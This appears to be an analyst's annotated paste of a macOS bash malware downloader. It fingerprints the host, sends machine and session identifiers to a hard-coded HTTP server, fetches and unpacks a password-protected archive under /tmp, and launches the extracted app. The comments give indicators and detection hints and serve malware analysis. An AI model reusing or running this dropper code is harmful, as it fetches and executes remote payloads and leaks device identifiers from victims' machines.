dissectmalware

Mal bash script - macOS

Sep 30th, 2018
Bash 0.87 KB | None | 0 0
  1. #!/bin/bash
     # Analyst summary: downloader/launcher stage. It fingerprints the host,
     # fetches a password-protected zip over plain HTTP, unpacks it under /tmp,
     # deletes the archive, marks the unpacked bundle's binaries executable and
     # launches it with `open -a`. No exit status is checked and nothing
     # verifies the download before it is executed.
     # Detection hint: a shell that spawns curl, `unzip -P` and `open -a` against
     # mktemp-style paths under /tmp, in that order.

     # Host profiling: macOS product version, as reported by sw_vers.
  2. os_version="$(sw_vers -productVersion)"
     # Fresh UUID per run; sent to the server and later passed to the payload.
  3. session_guid="$(uuidgen)"
     # IOPlatformUUID from the I/O registry: grep isolates the property line,
     # sed keeps the last quoted string on it (the UUID value), and tr drops
     # non-printable bytes. Unlike session_guid, this does not change per run.
  4. machine_id="$(echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@\1@p')" | tr -dc '[[:print:]]')"
     # Request URL (network indicator: this host and the /sd/ path). Cleartext
     # HTTP, so u= (machine id), s= (session) and o= (OS version) are visible
     # on the wire. c= and b= are fixed strings here; their meaning is not
     # shown — presumably campaign/build identifiers, to be confirmed.
  5. url="http://api.browserinterop.com/sd/?c=42NybQ==&u=$machine_id&s=$session_guid&o=$os_version&b=4757508878"
     # Hard-coded archive password. Its last ten digits equal the b= value and
     # its first ten are that value reversed, which may help when clustering
     # related samples.
  6. unzip_password="87880575746954757508878"
     # Randomly named staging file for the download.
  7. tmp_path="$(mktemp /tmp/XXXXXXXXX)"
     # -f: fail on HTTP errors, -0: use HTTP/1.0, -L: follow redirects.
     # Redirections apply left to right, so stdout ends up appended to
     # $tmp_path while stderr stays on /dev/null: the response body is saved
     # and all curl diagnostics are hidden.
  8. curl -f0L "$url" >/dev/null 2>&1 >>$tmp_path
     # Randomly named extraction directory; the trailing slash is part of the
     # value and is relied on when paths are concatenated below.
  9. app_dir="$(mktemp -d /tmp/XXXXXXXX)/"
     # Unpack with the embedded password; unzip output and errors are
     # discarded. The archive content cannot be read without that password.
  10. unzip -P "$unzip_password" "$tmp_path" -d "$app_dir" > /dev/null 2>&1
     # The downloaded archive is removed, so only the extracted directory
     # remains on disk for later collection.
  11. rm -f $tmp_path
     # Selects the first directory entry that does NOT match the regex "*.app".
     # In a basic regex the leading * is a literal asterisk, so in practice
     # this returns the first name that ls lists.
  12. file_name="$(grep -m1 -v "*.app" <(ls -1 "$app_dir"))"
     # If the working directory is under /Volumes/<name>/, keep that prefix;
     # otherwise the result is empty. Presumably the script is run from a
     # mounted volume such as a disk image — confirm against how it was
     # delivered.
  13. volume_name="$(echo -n "$PWD" | sed -E -n 's@^(/Volumes/[^/]+)/.*@\1@p')"
     # Spaces in the volume path are replaced with %20.
  14. volume_name="${volume_name// /%20}"
     # Every file in the bundle's Contents/MacOS directory is made executable.
  15. chmod +x "$app_dir$file_name/Contents/MacOS"/*
     # Launches the extracted bundle, passing the literal "s", the session
     # UUID and the originating volume path as its arguments.
  16. open -a "$app_dir$file_name" --args "s" "$session_guid" "$volume_name"